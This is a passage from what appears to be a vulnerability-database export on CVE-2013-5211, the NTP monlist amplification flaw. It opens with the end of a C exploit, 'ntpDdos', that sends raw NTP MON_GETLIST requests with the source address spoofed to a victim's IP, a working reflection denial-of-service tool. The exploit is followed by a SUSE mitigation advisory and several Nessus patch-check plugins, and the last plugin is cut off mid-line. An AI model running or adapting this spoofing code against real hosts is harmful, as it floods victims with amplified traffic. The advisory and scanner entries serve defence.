auth_seq; /* key, sequence number */\r\n unsigned char implementation; /* implementation number */\r\n unsigned char request; /* request number */\r\n unsigned short err_nitems; /* error code/number of data items */\r\n unsigned short mbz_itemsize; /* item size */\r\n char data[40]; /* data area [32 prev](176 byte max) */\r\n unsigned long tstamp; /* time stamp, for authentication */\r\n unsigned int keyid; /* encryption key */\r\n char mac[8]; /* (optional) 8 byte auth code */\r\n};\r\n \r\n \r\n// Calculates the checksum of the ip header.\r\nunsigned short csum(unsigned short *ptr,int nbytes)\r\n{\r\n register long sum;\r\n unsigned short oddbyte;\r\n register short answer;\r\n \r\n sum=0;\r\n while(nbytes>1) {\r\n sum+=*ptr++;\r\n nbytes-=2;\r\n }\r\n if(nbytes==1) {\r\n oddbyte=0;\r\n *((u_char*)&oddbyte)=*(u_char*)ptr;\r\n sum+=oddbyte;\r\n }\r\n \r\n sum = (sum>>16)+(sum & 0xffff);\r\n sum = sum + (sum>>16);\r\n answer=(short)~sum;\r\n return(answer);\r\n}\r\n \r\n \r\n//Da MAIN\r\n \r\nint main(int argc, char **argv)\r\n{\r\nint status; // Maintains the return values of the functions\r\nstruct iphdr *ip; // Pointer to ip header struct\r\nstruct udpheader *udp; // Pointer to udp header struct\r\nstruct ntpreqheader *ntp; // Pointer to ntp request header struct\r\nint sockfd; // Maintains the socket file descriptor\r\nint one = 1; // Sets the option IP_HDRINCL of the sockt to tell the kernel that the header are alredy included on the packets.\r\nstruct sockaddr_in dest; // Maintains the data of the destination address\r\nchar packet[ sizeof(struct iphdr) + sizeof(struct udpheader) + sizeof(struct ntpreqheader) ]; //Packet itself\r\n \r\n// Parameters check\r\n if( argc != 3){\r\n printf(\"Usage: ./ntpDdos [Target IP] [NTP Server IP]\\n\");\r\n printf(\"Example: ./ntpDdos 1.2.3.4 127.0.0.1 \\n\");\r\n printf(\"Watch it on wireshark!\\n\");\r\n printf(\"Coded for education purpose only!\\n\");\r\n exit(1);\r\n }\r\n \r\n// Create a socket and tells the kernel that we want to use udp as layer 4 protocol\r\n sockfd = socket(PF_INET, SOCK_RAW, IPPROTO_UDP);\r\n if (sockfd == -1){\r\n printf(\"Error on initializing the socket\\n\");\r\n exit(1);\r\n }\r\n \r\n \r\n \r\n//Sets the option IP_HDRINCL\r\n status = setsockopt( sockfd, IPPROTO_IP, IP_HDRINCL, &one, sizeof one);\r\n if (status == -1){\r\n printf(\"Error on setting the option HDRINCL on socket\\n\");\r\n exit(1);\r\n }\r\n \r\n \r\n//\"Zeroes\" all the packet stack\r\n memset( packet, 0, sizeof(packet) );\r\n \r\n \r\n//Mounts the packet headers\r\n// [ [IP HEADER] [UDP HEADER] [NTP HEADER] ] --> Victory!!!\r\n ip = (struct iphdr *)packet;\r\n udp = (struct udpheader *) (packet + sizeof(struct iphdr) );\r\n ntp = (struct ntpreqheader *) (packet + sizeof(struct iphdr) + sizeof(struct udpheader) );\r\n \r\n \r\n//Fill the IP Header\r\n ip->version = 4; //IPv4\r\n ip->ihl = 5; //Size of the Ip header, minimum 5\r\n ip->tos = 0; //Type of service, the default value is 0\r\n ip->tot_len = sizeof(packet); //Size of the datagram\r\n ip->id = htons(1234); //LengthIdentification Number\r\n ip->frag_off = 0; //Flags, zero represents reserved\r\n ip->ttl = 255; //Time to Live. Maximum of 255\r\n ip->protocol = IPPROTO_UDP; //Sets the UDP as the next layer protocol\r\n ip->check = 0; //Checksum.\r\n ip->saddr = inet_addr( argv[1] ); //Source ip ( spoofing goes here)\r\n ip->daddr = inet_addr( argv[2] ); //Destination IP\r\n \r\n //Fills the UDP Header\r\n udp->udp_sourcePortNumber = htons( atoi( \"123\" ) ); //Source Port\r\n udp->udp_destinationPortNumber = htons(atoi(\"123\")) ; //Destination Port\r\n udp->udp_length = htons( sizeof(struct udpheader) + sizeof(struct ntpreqheader) ); //Length of the packet\r\n udp->udp_checksum = 0; //Checksum\r\n \r\n //Calculate the checksums\r\n ip->check = csum((unsigned short *)packet, ip->tot_len); //Calculate the checksum for iP header\r\n \r\n //Sets the destination data\r\n dest.sin_family = AF_INET; // Address Family Ipv4\r\n dest.sin_port = htons (atoi( \"123\" ) ) ; // Destination port\r\n dest.sin_addr.s_addr = inet_addr( argv[2] ); // Destination Endere\u00e7o para onde se quer enviar o pacote\r\n \r\n //Fills the NTP header\r\n //Ok, here is the magic, we need to send a request ntp packet with the modes and codes sets for only MON_GETLIST\r\n //To do this we can import the ntp_types.h and use its structures and macros. To simplify i've created a simple version of the\r\n // ntp request packet and hardcoded the values for the fields to make a \"MON_GETLIST\" request packet.\r\n // To learn more, read this: http://searchcode.com/codesearch/view/451164#127\r\n ntp->rm_vn_mode=0x17; //Sets the response bit to 0, More bit to 0, Version field to 2, Mode field to 7\r\n ntp->implementation=0x03; //Sets the implementation to 3\r\n ntp->request=0x2a; //Sets the request field to 42 ( MON_GETLIST )\r\n //All the other fields of the struct are zeroed\r\n \r\n \r\n // Sends the packets\r\n status = sendto(sockfd, packet, ip->tot_len, 0, (struct sockaddr *)&dest, sizeof(dest) );\r\n if(status <0){\r\n printf(\"Failed to send the packets\\n\");\r\n exit(1);\r\n }\r\n \r\n \r\n}\n\n# 0day.today [2018-03-19] #", "sourceHref": "https://0day.today/exploit/22197", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "suse": [{"lastseen": "2016-04-13T00:07:25", "description": "The \"monlist\" command of the NTP protocol is currently abused in a DDoS reflection attack. This is done by spoofing packets from addresses to which the attack is directed to. The ntp installations itself are not target of the attack, but they are part of the DDoS network which the attacker is driving. It is therefore necessary to restrict ntp configurations to not answer spoofed \"monlist\" requests. It is not necessary to update the ntp software itself.\n#### Solution\nTo ensure that your ntpd installation can not participate in a DDoS attack, add the following line to your configuration: restrict default noquery", "cvss3": {}, "published": "2014-01-20T17:05:38", "type": "suse", "title": "DDoS reflection attacks in ntp", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2013-5211"], "modified": "2014-01-20T17:05:38", "id": "SUSE-SA:2014:001", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-01/msg00005.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "nessus": [{"lastseen": "2023-05-18T14:20:55", "description": "The monlist feature in ntpd in NTP allows remote attackers to cause a denial of service (traffic amplification) via forged (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests.", "cvss3": {}, "published": "2014-06-17T00:00:00", "type": "nessus", "title": "AIX 6.1 TL 8 : ntp (IV58068)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211"], "modified": "2023-04-21T00:00:00", "cpe": ["cpe:/o:ibm:aix:6.1"], "id": "AIX_IV58068.NASL", "href": "https://www.tenable.com/plugins/nessus/76078", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory ntp_advisory.asc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(76078);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/21\");\n\n script_cve_id(\"CVE-2013-5211\");\n\n script_name(english:\"AIX 6.1 TL 8 : ntp (IV58068)\");\n script_summary(english:\"Check for APAR IV58068\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The monlist feature in ntpd in NTP allows remote attackers to cause a\ndenial of service (traffic amplification) via forged (1)\nREQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://aix.software.ibm.com/aix/efixes/security/ntp_advisory.asc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate interim fix.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:6.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/06/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2023 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\nif (aix_check_ifix(release:\"6.1\", ml:\"08\", sp:\"04\", patch:\"IV58068s4a\", package:\"bos.net.tcp.client\", minfilesetver:\"6.1.8.0\", maxfilesetver:\"6.1.8.17\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:aix_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:26:15", "description": "The monlist feature in ntpd in NTP allows remote attackers to cause a denial of service (traffic amplification) via forged (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests.", "cvss3": {}, "published": "2014-06-17T00:00:00", "type": "nessus", "title": "AIX 6.1 TL 7 : ntp (IV58413)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211"], "modified": "2023-04-21T00:00:00", "cpe": ["cpe:/o:ibm:aix:6.1"], "id": "AIX_IV58413.NASL", "href": "https://www.tenable.com/plugins/nessus/76079", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory ntp_advisory.asc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(76079);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/21\");\n\n script_cve_id(\"CVE-2013-5211\");\n\n script_name(english:\"AIX 6.1 TL 7 : ntp (IV58413)\");\n script_summary(english:\"Check for APAR IV58413\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The monlist feature in ntpd in NTP allows remote attackers to cause a\ndenial of service (traffic amplification) via forged (1)\nREQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://aix.software.ibm.com/aix/efixes/security/ntp_advisory.asc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate interim fix.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:6.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/06/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2023 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\nif (aix_check_ifix(release:\"6.1\", ml:\"07\", sp:\"09\", patch:\"IV58413s9a\", package:\"bos.net.tcp.client\", minfilesetver:\"6.1.7.0\", maxfilesetver:\"6.1.7.20\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:aix_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:10:05", "description": "Description of changes:\n\n[4.2.6p5-22.0.1.el7_2.2]\n- add disable monitor to default ntp.conf [CVE-2013-5211]", "cvss3": {}, "published": "2016-09-13T00:00:00", "type": "nessus", "title": "Oracle Linux 7 : ntp (ELSA-2016-3612)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:ntp", "p-cpe:/a:oracle:linux:ntp-doc", "p-cpe:/a:oracle:linux:ntp-perl", "p-cpe:/a:oracle:linux:ntpdate", "p-cpe:/a:oracle:linux:sntp", "cpe:/o:oracle:linux:7"], "id": "ORACLELINUX_ELSA-2016-3612.NASL", "href": "https://www.tenable.com/plugins/nessus/93448", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2016-3612.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93448);\n script_version(\"2.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2013-5211\");\n\n script_name(english:\"Oracle Linux 7 : ntp (ELSA-2016-3612)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Description of changes:\n\n[4.2.6p5-22.0.1.el7_2.2]\n- add disable monitor to default ntp.conf [CVE-2013-5211]\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2016-September/006328.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected ntp packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ntp-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ntp-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ntpdate\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:sntp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/01/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"ntp-4.2.6p5-22.0.1.el7_2.2\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"ntp-doc-4.2.6p5-22.0.1.el7_2.2\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"ntp-perl-4.2.6p5-22.0.1.el7_2.2\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"ntpdate-4.2.6p5-22.0.1.el7_2.2\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"sntp-4.2.6p5-22.0.1.el7_2.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ntp / ntp-doc / ntp-perl / ntpdate / sntp\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:18:14", "description": "New ntp packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1, and -current to fix a security issue.", "cvss3": {}, "published": "2014-02-14T00:00:00", "type": "nessus", "title": "Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / current : ntp (SSA:2014-044-02)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:slackware:slackware_linux:ntp", "cpe:/o:slackware:slackware_linux", "cpe:/o:slackware:slackware_linux:13.0", "cpe:/o:slackware:slackware_linux:13.1", "cpe:/o:slackware:slackware_linux:13.37", "cpe:/o:slackware:slackware_linux:14.0", "cpe:/o:slackware:slackware_linux:14.1"], "id": "SLACKWARE_SSA_2014-044-02.NASL", "href": "https://www.tenable.com/plugins/nessus/72489", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2014-044-02. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(72489);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2013-5211\");\n script_bugtraq_id(64692);\n script_xref(name:\"SSA\", value:\"2014-044-02\");\n\n script_name(english:\"Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / current : ntp (SSA:2014-044-02)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New ntp packages are available for Slackware 13.0, 13.1, 13.37, 14.0,\n14.1, and -current to fix a security issue.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2014&m=slackware-security.575205\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?81014405\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected ntp package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.37\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/02/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/02/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"13.0\", pkgname:\"ntp\", pkgver:\"4.2.6p5\", pkgarch:\"i486\", pkgnum:\"1_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", arch:\"x86_64\", pkgname:\"ntp\", pkgver:\"4.2.6p5\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.0\")) flag++;\n\nif (slackware_check(osver:\"13.1\", pkgname:\"ntp\", pkgver:\"4.2.6p5\", pkgarch:\"i486\", pkgnum:\"1_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", arch:\"x86_64\", pkgname:\"ntp\", pkgver:\"4.2.6p5\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.1\")) flag++;\n\nif (slackware_check(osver:\"13.37\", pkgname:\"ntp\", pkgver:\"4.2.6p5\", pkgarch:\"i486\", pkgnum:\"1_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", arch:\"x86_64\", pkgname:\"ntp\", pkgver:\"4.2.6p5\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.37\")) flag++;\n\nif (slackware_check(osver:\"14.0\", pkgname:\"ntp\", pkgver:\"4.2.6p5\", pkgarch:\"i486\", pkgnum:\"3_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"ntp\", pkgver:\"4.2.6p5\", pkgarch:\"x86_64\", pkgnum:\"3_slack14.0\")) flag++;\n\nif (slackware_check(osver:\"14.1\", pkgname:\"ntp\", pkgver:\"4.2.6p5\", pkgarch:\"i486\", pkgnum:\"5_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"ntp\", pkgver:\"4.2.6p5\", pkgarch:\"x86_64\", pkgnum:\"5_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"ntp\", pkgver:\"4.2.6p5\", pkgarch:\"i486\", pkgnum:\"5\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"ntp\", pkgver:\"4.2.6p5\", pkgarch:\"x86_64\", pkgnum:\"5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:slackware_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:21:17", "description": "The monlist feature in ntpd in NTP allows remote attackers to cause a denial of service (traffic amplification) via forged (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests.", "cvss3": {}, "published": "2014-06-17T00:00:00", "type": "nessus", "title": "AIX 6.1 TL 9 : ntp (IV56213)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211"], "modified": "2023-04-21T00:00:00", "cpe": ["cpe:/o:ibm:aix:6.1"], "id": "AIX_IV56213.NASL", "href": "https://www.tenable.com/plugins/nessus/76075", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory ntp_advisory.asc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(76075);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/21\");\n\n script_cve_id(\"CVE-2013-5211\");\n\n script_name(english:\"AIX 6.1 TL 9 : ntp (IV56213)\");\n script_summary(english:\"Check for APAR IV56213\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The monlist feature in ntpd in NTP allows remote attackers to cause a\ndenial of service (traffic amplification) via forged (1)\nREQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://aix.software.ibm.com/aix/efixes/security/ntp_advisory.asc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate interim fix.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:6.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/06/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2023 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : 